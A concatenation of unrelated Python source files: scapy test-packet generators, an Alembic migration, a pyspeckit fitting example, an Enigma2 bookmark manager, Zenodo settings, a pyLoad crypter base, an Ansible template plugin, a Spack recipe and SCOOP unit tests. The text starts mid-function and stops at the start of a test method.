"""UDP packets of every supported size"""
header = Ether() / IP() / UDP()
for size in range(0, max_size - len(header)):
yield header / get_bytes(size, payload)
@public
def udp_random_sizes(npackets=100, payload=_default_payload()):
"""UDP packets with random sizes"""
header = Ether() / IP() / UDP()
max_size = 1500 - len(header)
for pkt in range(npackets):
yield header / get_bytes(random.randint(0, max_size), payload)
@public
def ipv4_small_packets(npackets=100, payload=_default_payload()):
"""Small (<100bytes payload) IPV4 packets"""
for pkt in range(npackets):
yield Ether() / IP() / get_bytes(random.randint(0, 100), payload)
|
"""Add mod versioning
Revision ID: 1d46e8d4483
Revises: 2650a2191fe
Create Date: 2014-06-10 01:29:49.567535
"""
revision = '1d46e8d4483'
down_revision = '2650a2191fe'
from alembic import op
import sqlalchemy as sa
def upgrade():
### commands auto generated by Alembic - please adjust! ###
op.drop_column('mod', 'ksp_version')
op.drop_column('mod', 'keywords')
### end Alembic commands ###
def downgrade():
### commands auto generated by Alembic - please adjust! ###
op.add_column('mod', sa.Column('keywords', sa.VARCHAR(length=256), autoincrement=False, nullable=True))
op.add_column('mod', sa.Column('ksp_version', sa.VARCHAR(length=16), autoincrement=False, nullable=True))
### end Alembic commands ###
|
import pyspeckit
import os
from pyspeckit.spectrum.models import nh2d
import numpy as np
import astropy.units as u
if not os.path.exists('p-nh2d_spec.fits'):
import astropy.utils.data as aud
from astropy.io import fits
f = aud.download_file('https://github.com/pyspeckit/pyspeckit-example-files/raw/master/p-nh2d_spec.fits')
with fits.open(f) as ff:
ff.writeto('p-nh2d_spec.fits')
spec = pyspeckit.Spectrum('p-nh2d_spec.fits')
rms = np.std(spec.data[10:340])
spec.error[:] = rms
spec.xarr.refX = 110.153594*u.GHz
spec.xarr.velocity_convention = 'radio'
spec.xarr.convert_to_unit('km/s')
F=False
T=True
import matplotlib.pyplot as plt
plt.ion()
spec.Registry.add_fitter('nh2d_vtau', pyspeckit.models.nh2d.nh2d_vtau_fitter,4)
spec.specfit(fittype='nh2d_vtau', guesses=[5.52, 2.15, 0.166, 0.09067],
verbose_level=4, signal_cut=1.5, limitedmax=[F,T,T,T], limitedmin=[T,T,T,T],
minpars=[0, 0, -1, 0.05], maxpars=[30.,50.,1,0.5], fixed=[F,F,F,F])
spec.plotter(errstyle='fill')
spec.specfit.plot_fit()
plt.savefig('example_p-NH2D.png')
|
import email
from email.Parser import Parser as MailParser
import time
def get_message_date(content, header='Date'):
"""
Parses mail and returns resulting timestamp.
:param header: the header to extract date from;
:returns: timestamp or `None` in the case of failure.
"""
message = MailParser().parsestr(content, True)
dateheader = message.get(header)
# parsedate_tz returns a 10-tuple that can be passed to mktime_tz
# Will be None if missing or not in a valid format. Note that
# indexes 6, 7, and 8 of the result tuple are not usable.
datetuple = email.utils.parsedate_tz(dateheader)
if datetuple is None:
return None
return email.utils.mktime_tz(datetuple)
|
class BookmarkData:
def __init__(self, _id, _title, _url, _parent, _type):
self.mId = _id
self.mTitle = _title
self.mUrl = _url
self.mParent = _parent
self.mType = _type
def dump(self, _intent=' '):
print "%s-> %d, %s, %s, %d, %d" % (_intent, self.mId, self.mTitle, self.mUrl, self.mParent, self.mType)
class CategoryData:
def __init__(self, _id, _name):
self.mId = _id
self.mName = _name
self.mBookmarks = {}
def setBookmarks(self, _bookmarks):
self.mBookmarks = _bookmarks
def appendBookmark(self, _bookmark):
self.mBookmarks[_bookmark.mId] = _bookmark
def dump(self):
print " -> %d, %s" % (self.mId, self.mName)
for key in self.mBookmarks.iterkeys():
self.mBookmarks[key].dump(' ')
import ConfigParser
class SimpleConfigParser:
def __init__(self):
self.mFileName = None
self.mConfig = None
self.mCategoryCurrentIdx = 0
self.mBookmarkCurrentIdx = 0
self.mDataValid = False
self.mPopulateValid = False
def _read(self):
if self.mDataValid:
return
print "populate!!"
self.mConfig.read(self.mFileName)
self.mCategoryCurrentIdx = self.getNumber('__SYS__', 'category_current_idx')
self.mBookmarkCurrentIdx = self.getNumber('__SYS__', 'bookmark_current_idx')
self.mDataValid = True
def _save(self):
with open(self.mFileName, 'wb') as bookmarkFile:
self.mConfig.write(bookmarkFile)
self.mDataValid = False
self.mPopulateValid = False
def _del(self, _section, _option=None):
#print _section, ' :', _option
if _option is None:
if not self.exist(_section):
return
self.mConfig.remove_section(_section)
return
if not self.exist(_section, _option):
return
self.mConfig.remove_option(_section, _option)
def _get(self, _section, _option, _default):
try:
data = self.mConfig.get(_section, _option)
except Exception, e:
#print e
return _default
else : return data
def _set(self, _section, _option, _value):
self.mConfig.set(_section, _option, _value)
def exist(self, _section, _option=None):
if _option is None:
return self.mConfig.has_section(_section)
return self.mConfig.has_option(_section, _option)
def setNumber(self, _section, _option, _value):
self._set(_section, _option, str(_value))
def setString(self, _section, _option, _value):
self._set(_section, _option, _value)
def getNumber(self, _section, _option, _default=0):
return int(self._get(_section, _option, _default))
def getString(self, _section, _option, _default=''):
return self._get(_section, _option, _default)
def delOption(self, _section, _option):
self._del(_section, _option)
def addSection(self, _section):
self.mConfig.add_section(_section)
def delSection(self, _section):
self._del(_section)
def init(self, _fileName):
self.mFileName = _fileName
self.mConfig = ConfigParser.RawConfigParser()
if self.mConfig is None:
return False
self._read()
return True
class BookmarkManager(SimpleConfigParser):
_instance = None
def __new__(cls, *args, **kwargs):
if not cls._instance:
cls._instance = super(Singleton, cls).__new__(cls, *args, **kwargs)
return cls._instance
def __init__(self, _dbFileName):
SimpleConfigParser.__init__(self)
self.mBookmarkRoot = None
self.mDebugEnable = True
import os
if not os.path.exists(_dbFileName):
f = file('/proc/stb/info/vumodel')
model = f.read().strip()
f.close()
manualmode = (model == "solo2" or model == "duo2")
out = open(_dbFileName, 'w')
line = "[__SYS__]\n"
line = line + "category_current_idx = 1\n"
if manualmode :
line = line + "bookmark_current_idx = 3\n"
else:
line = line + "bookmark_current_idx = 2\n"
line = line + "\n"
line = line + "[c-1]\n"
line = line + "id = 1\n"
line = line + "name = My favorite\n"
line = line + "\n"
line = line + "[b-1]\n"
line = line + "id = 1\n"
line = line + "title = Google Com\n"
line = line + "url = http://www.google.com/\n"
line = line + "parent = 1\n"
line = line + "type = 0\n"
line = line + "\n"
line = line + "[b-2]\n"
line = line + "id = 2\n"
line = line + "title = HBBig\n"
line = line + "url = http://www.hbbig.com/\n"
line = line + "parent = 1\n"
line = line + "type = 0\n"
line = line + "\n"
if manualmode :
line = line + "[b-3]\n"
line = line + "url = file:///usr/local/manual/main.html\n"
line = line + "id = 2\n"
line = line + "parent = 1\n"
line = line + "title = User Manual\n"
line = line + "type = 1\n"
out.write(line)
self.init(_dbFileName)
def message(self, format, params=None):
if not self.mDebugEnable:
return
if params is None:
print format
else: print format % (params)
def getBookmark(self, _title):
self.populate()
for key in self.mBookmarkRoot.iterkeys():
for key2 in self.mBookmarkRoot[key].mBookmarks.iterkeys():
if self.mBookmarkRoot[key].mBookmarks[key2].mTitle == _title:
return 'b-%d' % (self.mBookmarkRoot[key].mBookmarks[key2].mId)
return None
def addBookmark(self, _title, _url, _parent, _type):
if self.getBookmark(_title) is not None:
return False
i = self.mBookmarkCurrentIdx + 1
s = "b-%d" % (i,)
self.message("add bookmark : %s, %s, %d, %d", (_title, _url, _parent, _type,))
self.mConfig.add_section(s)
self.setNumber(s, 'id', i)
self.setString(s, 'title', _title)
self.setString(s, 'url', _url)
self.setNumber(s, 'parent', _parent)
self.setNumber(s, 'type', _type)
self.setNumber('__SYS__', 'bookmark_current_idx', i)
self._save()
return True
def deleteBookmark(self, _id):
self.populate()
self.message("delete bookmark : %d", (_id,))
self.delSection('b-%d' % (_id,))
self._save()
def updateBookmark(self, _bookmark):
self.populate()
s = "b-%d" % (_bookmark.mId)
self.message("update bookmark : %s, %s, %d, %d", (_bookmark.mTitle, _bookmark.mUrl, _bookmark.mParent, _bookmark.mType,))
self.setString(s, 'title', _bookmark.mTitle)
self.setString(s, 'url', _bookmark.mUrl)
self.setNumber(s, 'parent', _bookmark.mParent)
self.setNumber(s, 'type', _bookmark.mType)
self._save()
def getCategory(self, _name):
self.populate()
for key in self.mBookmarkRoot.iterkeys():
if self.mBookmarkRoot[key].mName == _name:
return 'c-%d' % (self.mBookmarkRoot[key].mId)
return None
def addCategory(self, _name):
if self.getCategory(_name) is not None:
return False
self.message("add category : %s", (_name,))
i = self.mCategoryCurrentIdx + 1
s = "c-%d" % (i)
self.mConfig.add_section(s)
self.setNumber(s, 'id', i)
self.setNumber(s, 'name', _name)
self.setNumber('__SYS__', 'category_current_idx', i)
self._save()
return True
def deleteCategory(self, _id):
self.populate()
self.message("delete category : %d", (_id,))
try:
for key in self.mBookmarkRoot[_id].mBookmarks.iterkeys():
self.delSection('b-%d' % (key,))
except: pass
self.delSection('c-%d' % (_id,))
self._save()
def updateCategory(self, _category):
self.populate()
self.message("update category : %s", (_category.mName,))
s = "c-%d" % (_category.mId)
self.setNumber(s, 'name', _category.mName)
self._save()
def populate(self):
cx, bx = 0, 0
categoryList = {}
self.message("populate : %d, %d", (self.mPopulateValid, self.mDataValid))
self._read()
if self.mPopulateValid:
return
while cx <= self.mCategoryCurrentIdx:
s = 'c-%d' % (cx,)
i = self.getNumber(s, 'id', -1)
if i != -1:
n = self.getString(s, 'name')
categoryList[i] = CategoryData(i, n)
cx += 1
sorted(categoryList)
while bx <= self.mBookmarkCurrentIdx:
s = 'b-%d' % (bx,)
i = self.getNumber(s, 'id', -1)
if i != -1:
t = self.getString(s, 'title')
u = self.getString(s, 'url')
p = self.getNumber(s, 'parent')
e = self.getNumber(s, 'type')
try:
categoryList[p].appendBookmark(BookmarkData(i, t, u, p, e))
except Exception, e: self._del(s)
bx += 1
for key in categoryList.iterkeys():
sorted(categoryList[key].mBookmarks)
self.mBookmarkRoot = categoryList
self.mPopulateValid = True
self.dump()
def getBookmarkRoot(self):
self.populate()
return self.mBookmarkRoot
def dump(self):
if not self.mDebugEnable:
return
self.populate()
print "-- snapshot --"
for key in self.mBookmarkRoot.iterkeys():
self.mBookmarkRoot[key].dump()
print "--------------"
@staticmethod
def getInstance():
return BookmarkManager('/etc/enigma2/hbbtv_bookmark.ini')
|
"""Configuration for Zenodo Records."""
from __future__ import absolute_import, print_function
from flask_babelex import gettext
from speaklater import make_lazy_gettext
_ = make_lazy_gettext(lambda: gettext)
ZENODO_COMMUNITIES_AUTO_ENABLED = True
"""Automatically add and request to communities upon publishing."""
ZENODO_COMMUNITIES_AUTO_REQUEST = ['zenodo', ]
"""Communities which are to be auto-requested upon first publishing."""
ZENODO_COMMUNITIES_REQUEST_IF_GRANTS = ['ecfunded', ]
"""Communities which are to be auto-requested if record has grants."""
ZENODO_COMMUNITIES_ADD_IF_GRANTS = []
"""Communities which are to be auto-added if record has grants."""
ZENODO_BUCKET_QUOTA_SIZE = 50 * 1000 * 1000 * 1000 # 50 GB
"""Maximum quota per bucket."""
ZENODO_MAX_FILE_SIZE = ZENODO_BUCKET_QUOTA_SIZE
"""Maximum file size accepted."""
|
from .Base import Base
from .misc import parse_name, safename
class Crypter(Base):
__name__ = "Crypter"
__type__ = "crypter"
__version__ = "0.20"
__status__ = "stable"
__pattern__ = r'^unmatchable$'
__config__ = [("activated", "bool", "Activated", True),
("use_premium", "bool", "Use premium account if available", True),
("folder_per_package", "Default;Yes;No", "Create folder for each package", "Default")]
__description__ = """Base decrypter plugin"""
__license__ = "GPLv3"
__authors__ = [("Walter Purcaro", "vuolter@gmail.com")]
def init_base(self):
#: Put all packages here. It's a list of tuples like: ( name, [list of links], folder )
self.packages = []
self.links = [] #: List of urls, pyLoad will generate packagenames
def setup_base(self):
self.packages = []
self.links = []
def process(self, pyfile):
self.decrypt(pyfile)
if self.links:
self._generate_packages()
elif not self.packages:
self.error(_("No link grabbed"), "decrypt")
self._create_packages()
def decrypt(self, pyfile):
"""
The "main" method of every crypter plugin, you **have to** overwrite it
"""
raise NotImplementedError
def _generate_packages(self):
"""
Generate new packages from self.links
"""
name = self.info['pattern'].get("N")
if name is None:
links = map(self.fixurl, self.links)
pdict = self.pyload.api.generatePackages(links)
packages = [(_name, _links, parse_name(_name))
for _name, _links in pdict.items()]
else:
packages = [(name, self.links, parse_name(name))]
self.packages.extend(packages)
def _create_packages(self):
"""
Create new packages from self.packages
"""
pack_folder = self.pyfile.package().folder
pack_password = self.pyfile.package().password
pack_queue = self.pyfile.package().queue
folder_per_package = self.config.get('folder_per_package', "Default")
if folder_per_package == "Default":
folder_per_package = self.pyload.config.get(
'general', 'folder_per_package')
else:
folder_per_package = folder_per_package == "Yes"
for name, links, folder in self.packages:
self.log_info(_("Create package: %s") % name,
_("%d links") % len(links))
links = map(self.fixurl, links)
self.log_debug("LINKS for package " + name, *links)
pid = self.pyload.api.addPackage(name, links, pack_queue)
if pack_password:
self.pyload.api.setPackageData(
pid, {'password': pack_password})
#: Workaround to do not break API addPackage method
set_folder = lambda x: self.pyload.api.setPackageData(
pid, {'folder': safename(x or "")})
if not folder_per_package:
folder = pack_folder
elif not folder or folder == name:
folder = parse_name(name)
self.log_info(_("Save package `%(name)s` to folder: %(folder)s")
% {'name': name, 'folder': folder})
set_folder(folder)
|
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import base64
import datetime
import os
import time
from ansible import constants as C
from ansible.plugins.action import ActionBase
from ansible.utils.hashing import checksum_s
from ansible.utils.unicode import to_bytes
class ActionModule(ActionBase):
TRANSFERS_FILES = True
def get_checksum(self, tmp, dest, try_directory=False, source=None):
remote_checksum = self._remote_checksum(tmp, dest)
if remote_checksum in ('0', '2', '3', '4'):
# Note: 1 means the file is not present which is fine; template
# will create it. 3 means directory was specified instead of file
if try_directory and remote_checksum == '3' and source:
base = os.path.basename(source)
dest = os.path.join(dest, base)
remote_checksum = self.get_checksum(tmp, dest, try_directory=False)
if remote_checksum not in ('0', '2', '3', '4'):
return remote_checksum
result = dict(failed=True, msg="failed to checksum remote file."
" Checksum error code: %s" % remote_checksum)
return result
return remote_checksum
def run(self, tmp=None, task_vars=dict()):
''' handler for template operations '''
source = self._task.args.get('src', None)
dest = self._task.args.get('dest', None)
faf = self._task.first_available_file
if (source is None and faf is not None) or dest is None:
return dict(failed=True, msg="src and dest are required")
if tmp is None:
tmp = self._make_tmp_path()
if faf:
#FIXME: issue deprecation warning for first_available_file, use with_first_found or lookup('first_found',...) instead
found = False
for fn in faf:
fn_orig = fn
fnt = self._templar.template(fn)
fnd = self._loader.path_dwim(self._task._role_._role_path, 'templates', fnt)
if not os.path.exists(fnd):
of = task_vars.get('_original_file', None)
if of is not None:
fnd = self._loader.path_dwim(self._task._role_._role_path, 'templates', of)
if os.path.exists(fnd):
source = fnd
found = True
break
if not found:
return dict(failed=True, msg="could not find src in first_available_file list")
else:
if self._task._role is not None:
source = self._loader.path_dwim_relative(self._task._role._role_path, 'templates', source)
else:
source = self._loader.path_dwim(source)
# Expand any user home dir specification
dest = self._remote_expand_user(dest, tmp)
directory_prepended = False
if dest.endswith(os.sep):
directory_prepended = True
base = os.path.basename(source)
dest = os.path.join(dest, base)
# template the source data locally & get ready to transfer
try:
with open(source, 'r') as f:
template_data = f.read()
try:
template_uid = pwd.getpwuid(os.stat(source).st_uid).pw_name
except:
template_uid = os.stat(source).st_uid
vars = task_vars.copy()
vars['template_host'] = os.uname()[1]
vars['template_path'] = source
vars['template_mtime'] = datetime.datetime.fromtimestamp(os.path.getmtime(source))
vars['template_uid'] = template_uid
vars['template_fullpath'] = os.path.abspath(source)
vars['template_run_date'] = datetime.datetime.now()
managed_default = C.DEFAULT_MANAGED_STR
managed_str = managed_default.format(
host = vars['template_host'],
uid = vars['template_uid'],
file = to_bytes(vars['template_path'])
)
vars['ansible_managed'] = time.strftime(
managed_str,
time.localtime(os.path.getmtime(source))
)
old_vars = self._templar._available_variables
self._templar.set_available_variables(vars)
resultant = self._templar.template(template_data, preserve_trailing_newlines=True)
self._templar.set_available_variables(old_vars)
except Exception as e:
return dict(failed=True, msg=type(e).__name__ + ": " + str(e))
local_checksum = checksum_s(resultant)
remote_checksum = self.get_checksum(tmp, dest, not directory_prepended, source=source)
if isinstance(remote_checksum, dict):
# Error from remote_checksum is a dict. Valid return is a str
return remote_checksum
if local_checksum != remote_checksum:
# if showing diffs, we need to get the remote value
dest_contents = ''
# FIXME: still need to implement diff mechanism
#if self.runner.diff:
# # using persist_files to keep the temp directory around to avoid needing to grab another
# dest_result = self.runner._execute_module(conn, tmp, 'slurp', "path=%s" % dest, task_vars=task_vars, persist_files=True)
# if 'content' in dest_result.result:
# dest_contents = dest_result.result['content']
# if dest_result.result['encoding'] == 'base64':
# dest_contents = base64.b64decode(dest_contents)
# else:
# raise Exception("unknown encoding, failed: %s" % dest_result.result)
xfered = self._transfer_data(self._connection._shell.join_path(tmp, 'source'), resultant)
# fix file permissions when the copy is done as a different user
if self._connection_info.become and self._connection_info.become_user != 'root':
self._remote_chmod('a+r', xfered, tmp)
# run the copy module
new_module_args = self._task.args.copy()
new_module_args.update(
dict(
src=xfered,
dest=dest,
original_basename=os.path.basename(source),
follow=True,
),
)
result = self._execute_module(module_name='copy', module_args=new_module_args, task_vars=task_vars)
if result.get('changed', False):
result['diff'] = dict(before=dest_contents, after=resultant)
return result
else:
# when running the file module based on the template data, we do
# not want the source filename (the name of the template) to be used,
# since this would mess up links, so we clear the src param and tell
# the module to follow links. When doing that, we have to set
# original_basename to the template just in case the dest is
# a directory.
new_module_args = self._task.args.copy()
new_module_args.update(
dict(
src=None,
original_basename=os.path.basename(source),
follow=True,
),
)
return self._execute_module(module_name='file', module_args=new_module_args, task_vars=task_vars)
|
from spack import *
class Xgc(AutotoolsPackage):
"""xgc is an X11 graphics demo that shows various features of the X11
core protocol graphics primitives."""
homepage = "http://cgit.freedesktop.org/xorg/app/xgc"
url = "https://www.x.org/archive/individual/app/xgc-1.0.5.tar.gz"
version('1.0.5', '605557a9c138f6dc848c87a21bc7c7fc')
depends_on('libxaw')
depends_on('libxt')
depends_on('flex', type='build')
depends_on('bison', type='build')
depends_on('pkgconfig', type='build')
depends_on('util-macros', type='build')
|
import scoop
scoop.DEBUG = False
import unittest
import subprocess
import time
import copy
import os
import sys
import operator
import signal
import math
from tests_parser import TestUtils
from tests_stat import TestStat
from tests_stopwatch import TestStopWatch
from scoop import futures, _control, utils, shared
from scoop._types import FutureQueue
from scoop.broker.structs import BrokerInfo
subprocesses = []
def cleanSubprocesses():
[a.kill() for a in subprocesses]
try:
signal.signal(signal.SIGQUIT, cleanSubprocesses)
except AttributeError:
# SIGQUIT doesn't exist on Windows
signal.signal(signal.SIGTERM, cleanSubprocesses)
def func0(n):
task = futures.submit(func1, n)
result = task.result()
return result
def func1(n):
result = futures.map(func2, [i+1 for i in range(n)])
return sum(result)
def func2(n):
launches = []
for i in range(n):
launches.append(futures.submit(func3, i + 1))
result = futures.as_completed(launches)
return sum(r.result() for r in result)
def func3(n):
result = list(futures.map(func4, [i+1 for i in range(n)]))
return sum(result)
def func4(n):
result = n * n
return result
def funcLambda(n):
lambda_func = lambda x : x*x
result = list(futures.map(lambda_func, [i+1 for i in range(n)]))
return sum(result)
def funcWithKW(n, **kwargs):
return kwargs
def funcLambdaSubfuncNotGlobal(n):
"""Tests a lambda function containing a call to a function that is not in
the globals()."""
my_mul = operator.mul
lambda_func = lambda x : my_mul(x, x)
result = list(futures.map(lambda_func, [i+1 for i in range(n)]))
return sum(result)
def funcCos():
result = list(futures.map(math.cos, [i for i in range(10)]))
return sum(result)
def funcCallback():
f = futures.submit(func4, 100)
def callBack(future):
future.was_callabacked = True
f.add_done_callback(callBack)
if len(f.callback) == 0:
return False
futures.wait((f,))
try:
return f.was_callabacked
except:
return False
def funcCancel():
f = futures.submit(func4, 100)
f.cancel()
return f.cancelled()
def funcCompleted(n):
launches = []
for i in range(n):
launches.append(futures.submit(func4, i + 1))
result = futures.as_completed(launches)
return sum(r.result() for r in result)
def funcDone():
f = futures.submit(func4, 100)
futures.wait((f,))
done = f.done()
if done != True:
return done
res = f.result()
done = f.done()
return done
def funcWait(timeout):
fs = [futures.submit(func4, i) for i in range(1000)]
done, not_done = futures.wait(fs, timeout=timeout)
return done, not_done
def funcExcept(n):
f = futures.submit(funcRaise, n)
try:
f.result()
except:
return True
return False
def funcRaise(n):
raise Exception("Test exception")
def funcSub(n):
f = futures.submit(func4, n)
return f.result()
def funcMapScan(l):
resultat = futures.mapScan(func4,
operator.add,
l)
_control.execQueue.socket.pumpInfoSocket()
return resultat
def funcMapReduce(l):
resultat = futures.mapReduce(func4,
operator.add,
l)
_control.execQueue.socket.pumpInfoSocket()
return resultat
def funcDoubleMapReduce(l):
resultat = futures.mapReduce(func4,
operator.add,
l)
resultat2 = futures.mapReduce(func4,
operator.add,
l)
_control.execQueue.socket.pumpInfoSocket()
return resultat == resultat2
def funcUseSharedConstant():
# Tries on a mutable and an immutable object
assert shared.getConst('myVar') == {
1: 'Example 1',
2: 'Example 2',
3: 'Example 3',
}
assert shared.getConst('secondVar') == "Hello World!"
return True
def funcUseSharedFunction():
assert shared.getConst('myRemoteFunc')(5) == 5 * 5
assert shared.getConst('myRemoteFunc')(25) == 25 * 25
return True
def funcSharedConstant():
shared.setConst(myVar={1: 'Example 1',
2: 'Example 2',
3: 'Example 3',
})
shared.setConst(secondVar="Hello World!")
result = True
for _ in range(100):
try:
result &= futures.submit(funcUseSharedConstant).result()
except AssertionError:
result = False
return result
def funcSharedFunction():
shared.setConst(myRemoteFunc=func4)
result = True
for _ in range(100):
try:
result &= futures.submit(funcUseSharedFunction).result()
except AssertionError:
result = False
return result
def funcMapAsCompleted(n):
result = list(futures.map_as_completed(func4, [i+1 for i in range(n)]))
return sum(result)
def funcIter(n):
result = list(futures.map(func4, (i+1 for i in range(n))))
return sum(result)
def funcKeywords(n, **kwargs):
task = futures.submit(funcWithKW, n, **kwargs)
futures.wait([task], return_when=futures.ALL_COMPLETED)
result = task.result()
return result
def main(n):
task = futures.submit(func0, n)
futures.wait([task], return_when=futures.ALL_COMPLETED)
result = task.result()
return result
def mainSimple(n):
task = futures.submit(func3, n)
futures.wait([task], return_when=futures.ALL_COMPLETED)
result = task.result()
return result
def submit_get_queues_size(n):
task = futures.submit(func4, n)
result = task.result()
return [
len(_control.execQueue.inprogress),
len(_control.execQueue.ready),
len(_control.execQueue.movable),
len(_control.futureDict) - 1, # - 1 because the current function is a future too
]
def map_get_queues_size(n):
result = list(map(func4, [n for n in range(n)]))
return [
len(_control.execQueue.inprogress),
len(_control.execQueue.ready),
len(_control.execQueue.movable),
len(_control.futureDict) - 1, # - 1 because the current function is a future too
]
def port_ready(port, socket):
"""Checks if a given port is already binded"""
try:
socket.connect(('127.0.0.1', port))
except IOError:
return False
else:
socket.shutdown(2)
socket.close()
return True
class TestScoopCommon(unittest.TestCase):
def __init__(self, *args, **kwargs):
# Parent initialization
super(TestScoopCommon, self).__init__(*args, **kwargs)
def multiworker_set(self):
global subprocesses
worker = subprocess.Popen([sys.executable, "-m", "scoop.bootstrap.__main__",
"--brokerHostname", "127.0.0.1", "--taskPort", "5555",
"--metaPort", "5556", "tests.py"])
subprocesses.append(worker)
return worker
def setUp(self):
global subprocesses
import socket, datetime, time
# Start the server
self.server = subprocess.Popen([sys.executable, "-m", "scoop.broker.__main__",
"--tPort", "5555", "--mPort", "5556"])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
begin = datetime.datetime.now()
while not port_ready(5555, s):
if (datetime.datetime.now() - begin > datetime.timedelta(seconds=3)):
raise Exception('Could not start server!')
subprocesses.append(self.server)
# Setup worker environment
scoop.IS_RUNNING = True
scoop.IS_ORIGIN = True
scoop.WORKER_NAME = 'origin'.encode()
scoop.BROKER_NAME = 'broker'.encode()
scoop.BROKER = BrokerInfo("127.0.0.1",
5555,
5556,
"127.0.0.1")
scoop.worker = (scoop.WORKER_NAME, scoop.BROKER_NAME)
scoop.MAIN_MODULE = "tests.py"
scoop.VALID = True
scoop.DEBUG = False
scoop.SIZE = 2
_control.execQueue = FutureQueue()
def tearDown(self):
global subprocesses
import socket, datetime, time
_control.execQueue.shutdown()
del _control.execQueue
_control.futureDict.clear()
try:
self.w.terminate()
self.w.wait()
except:
pass
# Destroy the server
if self.server.poll() == None:
try:
self.server.terminate()
self.server.wait()
except:
pass
# Stabilise zmq after a deleted socket
del subprocesses[:]
# Wait for the previous server to be correctly terminated
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
begin = datetime.datetime.now()
while port_ready(5555, s):
if (datetime.datetime.now() - begin > datetime.timedelta(seconds=3)):
raise Exception('Could not terminate server!')
s.close()
class TestMultiFunction(TestScoopCommon):
def __init__(self, *args, **kwargs):
# Parent initialization
super(TestMultiFunction, self).__init__(*args, **kwargs)
self.main_func = main
self.small_result = 77
self.large_result = 76153
def test_small_uniworker(self):
_control.FutureQueue.highwatermark = 10
_control.FutureQueue.lowwatermark = 5
result = futures._startup(self.main_func, 4)
self.assertEqual(result, self.small_result)
def test_small_no_lowwatermark_uniworker(self):
_control.FutureQueue.highwatermark = 9999999999999
_control.FutureQueue.lowwatermark = 1
result = futures._startup(self.main_func, 4)
self.assertEqual(result, self.small_result)
def test_small_foreign_uniworker(self):
_control.FutureQueue.highwatermark = 1
result = futures._startup(self.main_func, 4)
self.assertEqual(result, self.small_result)
def test_small_local_uniworker(self):
_control.FutureQueue.highwatermark = 9999999999999
result = futures._startup(self.main_func, 4)
self.assertEqual(result, self.small_result)
def test_large_uniworker(self):
_control.FutureQueue.highwatermark = 9999999999999
result = futures._startup(self.main_func, 20)
self.assertEqual(result, self.large_result)
def test_large_no_lowwatermark_uniworker(self):
_control.FutureQueue.lowwatermark = 1
_control.FutureQueue.highwatermark = 9999999999999
result = futures._startup(self.main_func, 20)
self.assertEqual(result, self.large_result)
def test_large_foreign_uniworker(self):
_control.FutureQueue.highwatermark = 1
result = futures._startup(self.main_func, 20)
self.assertEqual(result, self.large_result)
def test_large_local_uniworker(self):
_control.FutureQueue.highwatermark = 9999999999999
result = futures._startup(self.main_func, 20)
self.assertEqual(result, self.large_result)
def test_small_local_multiworker(self):
self.w = self.multiworker_set()
_control.FutureQueue.highwatermark = 9999999999999
Backupenv = os.environ.copy()
result = futures._startup(self.main_func, 4)
self.assertEqual(result, self.small_result)
os.environ = Backupenv
def test_small_foreign_multiworker(self):
self.w = self.multiworker_set()
_control.FutureQueue.highwatermark = 1
Backupenv = os.environ.copy()
result = futures._startup(self.main_func, 4)
self.assertEqual(result, self.small_result)
os.environ = Backupenv
def test_execQueue_multiworker(self):
self.w = self.multiworker_set()
result = futures._startup(func0, 6)
self.assertEqual(len(_control.execQueue.inprogress), 0)
self.assertEqual(len(_control.execQueue.ready), 0)
self.assertEqual(len(_control.execQueue.movable), 0)
self.assertEqual(len(_control.futureDict), 0)
def test_execQueue_uniworker(self):
result = futures._startup(func0, 6)
self.assertEqual(len(_control.execQueue.inprogress), 0)
self.assertEqual(len(_control.execQueue.ready), 0)
self.assertEqual(len(_control.execQueue.movable), 0)
self.assertEqual(len(_control.futureDict), 0)
def test_execQueue_submit_uniworker(self):
result = futures._startup(submit_get_queues_size, 6)
self.assertEqual(
result,
[0 for _ in range(len(result))],
"Buffers are not empty after future completion"
)
def test_execQueue_map_uniworker(self):
result = futures._startup(map_get_queues_size, 6)
self.assertEqual(
result,
[0 for _ in range(len(result))],
"Buffers are not empty after future completion"
)
def test_execQueue_submit_multiworker(self):
self.w = self.multiworker_set()
result = futures._startup(submit_get_queues_size, 6)
self.assertEqual(
result,
[0 for _ in range(len(result))],
"Buffers are not empty after future completion"
)
def test_execQueue_map_multiworker(self):
self.w = self.multiworker_set()
result = futures._startup(map_get_queues_size, 6)
self.assertEqual(
result,
[0 for _ in range(len(result))],
"Buffers are not empty after future completion"
)
def test_partial(self):
"""This function removes some attributes (such as __name__)."""
from functools import partial
result = futures._startup(partial(self.main_func), 4)
self.assertEqual(result, self.small_result)
class TestSingleFunction(TestMultiFunction):
def __init__(self, *args, **kwargs):
# Parent initialization
super(TestSingleFunction, self).__init__(*args, **kwargs)
self.main_func = mainSimple
self.small_result = 30
self.large_result = 2870
class TestApi(TestScoopCommon):
def __init(self, *args, **kwargs):
super(TestApi, self).__init(*args, **kwargs)
def test_as_Completed_single(self):
result = futures._startup(funcCompleted, 30)
self.assertEqual(result, 9455)
def test_as_Completed_multi(self):
self.w = self.multiworker_set()
result = futures._startup(funcCompleted, 30)
self.assertEqual(result, 9455)
def test_map_single(self):
result = futures._startup(func3, 30)
self.assertEqual(result, 9455)
def test_map_multi(self):
self.w = self.multiworker_set()
result = futures._startup(func3, 30)
self.assertEqual(result, 9455)
def test_map_lambda(self):
self.w = self.multiworker_set()
result = futures._startup(funcLambda, 30)
self.assertEqual(result, 9455)
def test_submit_with_keyword(self):
result = futures._startup(funcKeywords, 2, kwarg=3.1415926)
self.assertEqual(result, { "kwarg": 3.1415926} )
# This test is complex to handle and has many implications
# Bundle a closure with the future?
# How to manage side-effects of variables in closure?
#def test_map_lambda_subfunc_not_global(self):
# self.w = self.multiworker_set()
# result = futures._startup(funcLambdaSubfuncNotGlobal, 30)
# self.assertEqual(result, 9455)
def test_map_imported_func(self):
self.w = self.multiworker_set()
result = futures._startup(funcCos)
self.assertGreater(result, 0.4)
self.assertLess(result, 0.5)
def test_submit_single(self):
result = futures._startup(funcSub, 10)
self.assertEqual(result, 100)
def test_submit_multi(self):
self.w = self.multiworker_set()
result = futures._startup(funcSub, 10)
self.assertEqual(result, 100)
def test_exception_single(self):
result = futures._startup(funcExcept, 19)
self.assertTrue(result)
def test_exception_multi(self):
self.w = self.multiworker_set()
result = futures._startup(funcExcept, 19)
self.assertTrue(result)
def test_done(self):
result = futures._startup(funcDone)
self.assertTrue(result)
def test_cancel(self):
